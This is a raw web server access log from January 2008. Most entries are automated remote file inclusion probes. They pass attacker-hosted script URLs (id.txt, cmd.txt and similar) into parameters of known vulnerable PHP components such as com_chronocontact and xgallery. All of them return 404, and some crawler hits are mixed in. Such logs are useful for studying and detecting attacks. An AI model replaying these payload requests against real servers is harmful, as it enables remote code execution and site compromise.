24.23.164.127 - - [31/Jan/2008:11:29:48 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.19.219 - - [31/Jan/2008:11:31:08 -0800] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:11:31:31 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/BIFFwriter.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [31/Jan/2008:11:31:36 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:11:31:36 -0800] "GET //administrator/components/com_chronocontact/BIFFwriter.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:11:31:37 -0800] "GET /logs//administrator/components/com_chronocontact/BIFFwriter.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.23 - - [31/Jan/2008:11:31:38 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:11:32:42 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:11:32:47 -0800] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:11:32:53 -0800] "GET /logs/access_080117.log//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:11:32:53 -0800] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:11:32:53 -0800] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.21.198.30 - - [31/Jan/2008:11:33:02 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:33:21 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:11:33:42 -0800] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=com_juserhttp://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:34:11 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:34:18 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.105.25 - - [31/Jan/2008:11:34:26 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.105.25 - - [31/Jan/2008:11:34:27 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.156.10 - - [31/Jan/2008:11:34:27 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:11:34:35 -0800] "GET //becommunity/index.php?pageurl=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:11:34:35 -0800] "GET //becommunity/community/index.php?pageurl=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:11:34:37 -0800] "GET /logs/access_080117.log//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=com_juserhttp://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:11:34:37 -0800] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=com_juserhttp://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.55.178 - - [31/Jan/2008:11:34:37 -0800] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=com_juserhttp://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [31/Jan/2008:11:37:06 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.255.3.70 - - [31/Jan/2008:11:39:14 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
89.255.3.70 - - [31/Jan/2008:11:39:14 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.6.28.79 - - [31/Jan/2008:11:39:35 -0800] "GET /presto/?S=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.218.159.157 - - [31/Jan/2008:11:39:36 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.218.159.157 - - [31/Jan/2008:11:39:36 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
207.58.184.150 - - [31/Jan/2008:11:39:55 -0800] "GET /logs/access_071224.log/skins/advanced/advanced1.php?pluginpath[0]=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [31/Jan/2008:11:39:56 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
140.113.4.81 - - [31/Jan/2008:11:40:23 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [31/Jan/2008:11:40:23 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.210.96.108 - - [31/Jan/2008:11:41:16 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
67.210.96.108 - - [31/Jan/2008:11:41:16 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
69.57.148.17 - - [31/Jan/2008:11:41:16 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.57.148.17 - - [31/Jan/2008:11:41:16 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
140.113.4.81 - - [31/Jan/2008:11:41:18 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.248.237.210 - - [31/Jan/2008:11:42:43 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.248.237.210 - - [31/Jan/2008:11:42:45 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.35.191.105 - - [31/Jan/2008:11:43:12 -0800] "GET /skins/advanced/advanced1.php?pluginpath%5B0%5D=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:11:43:34 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.7.194.105 - - [31/Jan/2008:11:44:00 -0800] "GET //include/write.php?dir=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.7.194.105 - - [31/Jan/2008:11:44:01 -0800] "GET /logs//include/write.php?dir=http://www.bpec-english.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
218.234.23.53 - - [31/Jan/2008:11:44:51 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
218.234.23.53 - - [31/Jan/2008:11:44:51 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:46:08 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [31/Jan/2008:11:46:08 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://mobee.ru/usr/xml/c?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:46:16 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:46:16 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:46:16 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:46:16 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:46:16 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:46:17 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:47:24 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:47:24 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:47:24 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:48:16 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:48:16 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:48:16 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.236.107 - - [31/Jan/2008:11:48:42 -0800] "GET /logs/access_071228.log//index.php?pagina=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.236.107 - - [31/Jan/2008:11:48:42 -0800] "GET //index.php?pagina=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.236.107 - - [31/Jan/2008:11:48:42 -0800] "GET /logs//index.php?pagina=http://www.geocities.com/paddy.only/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.101.4.42 - - [31/Jan/2008:11:48:46 -0800] "GET /logs/access_080117.log//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=com_juserhttp://www.bjlfansite.be/site/media/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [31/Jan/2008:11:48:47 -0800] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=com_juserhttp://www.bjlfansite.be/site/media/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [31/Jan/2008:11:48:47 -0800] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=com_juserhttp://www.bjlfansite.be/site/media/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:11:49:25 -0800] "GET /megumi/Bracelet/?D=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.90.48.3 - - [31/Jan/2008:11:49:27 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.365dwd.com/365th/modules/Neos_Chronos/maps/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
202.90.48.3 - - [31/Jan/2008:11:49:27 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.365dwd.com/365th/modules/Neos_Chronos/maps/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
72.30.216.103 - - [31/Jan/2008:11:50:05 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.101.4.42 - - [31/Jan/2008:11:50:24 -0800] "GET /logs/access_071230.log//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=com_juserhttp://www.bjlfansite.be/site/media/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.35.191.105 - - [31/Jan/2008:11:50:40 -0800] "GET /logs/access_071224.log/skins/advanced/advanced1.php?pluginpath%5B0%5D=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.105 - - [31/Jan/2008:11:50:45 -0800] "GET /logs/skins/advanced/advanced1.php?pluginpath%5B0%5D=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
88.248.237.210 - - [31/Jan/2008:11:51:19 -0800] "GET /logs/access_080101.log/index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.248.237.210 - - [31/Jan/2008:11:51:20 -0800] "GET /logs/index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.73 - - [31/Jan/2008:11:52:18 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:53:44 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:53:44 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:53:44 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:54:04 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:54:04 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [31/Jan/2008:11:54:04 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.erasmusbcn.com/gallery/g2data/albums/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.10.136.201 - - [31/Jan/2008:11:54:09 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://karavell.com/cmd???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.248.237.210 - - [31/Jan/2008:11:54:39 -0800] "GET /logs/access_080106.log/index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.35.191.105 - - [31/Jan/2008:11:56:19 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.bakhshian.ir/language/lang/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.98.150.12 - - [31/Jan/2008:11:56:22 -0800] "GET /Neos_Chronos/header.php?base_folder=http://happystation.biz/Smileys/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:11:56:41 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/BIFFwriter.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.115 - - [31/Jan/2008:11:57:24 -0800] "GET /logs/access_071229.log//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.115 - - [31/Jan/2008:11:57:25 -0800] "GET //errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.115 - - [31/Jan/2008:11:57:25 -0800] "GET /logs//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.90.48.3 - - [31/Jan/2008:11:57:48 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.365dwd.com/365th/modules/Neos_Chronos/maps/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
89.111.173.115 - - [31/Jan/2008:11:58:31 -0800] "GET /logs/access_071225.log//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.225.246.28 - - [31/Jan/2008:12:01:56 -0800] "GET /logs/access_080117.log/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.servingweb.com/images/5? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.246.28 - - [31/Jan/2008:12:01:56 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.servingweb.com/images/5? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.246.28 - - [31/Jan/2008:12:01:56 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.servingweb.com/images/5? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.223 - - [31/Jan/2008:12:04:58 -0800] "GET /minamijewelry/html/custom.html HTTP/1.0" 200 12705 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.145.150.11 - - [31/Jan/2008:12:05:22 -0800] "GET /logs/access_071230.log//language/lang_english/udj.php?phpbb_root_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.145.150.11 - - [31/Jan/2008:12:05:22 -0800] "GET //language/lang_english/udj.php?phpbb_root_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.145.150.11 - - [31/Jan/2008:12:05:23 -0800] "GET /logs//language/lang_english/udj.php?phpbb_root_path=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.77.45 - - [31/Jan/2008:12:06:00 -0800] "GET /logs/access_071225.log//multithumb/multithumb?mosConfig_absolute_path=http://mail.elec2m.fr/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.70.35.179 - - [31/Jan/2008:12:06:23 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
